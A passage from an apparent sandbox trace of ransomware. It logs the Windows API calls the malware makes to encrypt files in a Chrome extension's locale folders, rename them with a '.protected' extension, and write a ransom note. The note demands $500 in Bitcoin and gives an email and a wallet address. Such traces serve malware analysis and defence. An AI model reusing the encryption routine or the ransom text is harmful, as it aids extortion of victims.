lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.882] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.882] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.882] CloseHandle (hObject=0x168) returned 1 [0083.882] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected") returned 174 [0083.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected")) returned 1 [0083.883] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.883] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.883] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\RESTORE_FILES.txt") returned 168 [0083.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.884] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.884] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.885] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.885] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.885] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.885] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.885] CloseHandle (hObject=0x164) returned 1 [0083.885] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Windows") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Program Files") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Program Files (x86)") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="$Recycle.bin") returned 1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="System Volume Information") returned -1 [0083.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned 150 [0083.885] lstrcmpW (lpString1="nb", lpString2=".") returned 1 [0083.886] lstrcmpW (lpString1="nb", lpString2="..") returned 1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*") returned 152 [0083.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\.") returned 152 [0083.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.886] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\..") returned 153 [0083.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.886] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.886] 
lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.887] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.887] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.887] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.887] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.889] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.889] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.889] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.890] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.890] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.890] CloseHandle (hObject=0x168) returned 1 [0083.890] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected") returned 174 [0083.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected")) returned 1 [0083.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.891] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\RESTORE_FILES.txt") returned 168 [0083.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.891] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.891] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, 
lpOverlapped=0x0) returned 1 [0083.892] lstrlenA (lpString="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") returned 684 [0083.892] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.892] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.892] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.892] CloseHandle (hObject=0x164) returned 1 [0083.892] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned 150 [0083.893] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0083.893] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*") returned 152 [0083.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\.") returned 152 [0083.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.893] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\..") returned 153 [0083.893] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.893] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.893] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.894] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.894] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.894] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.894] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.895] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.895] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
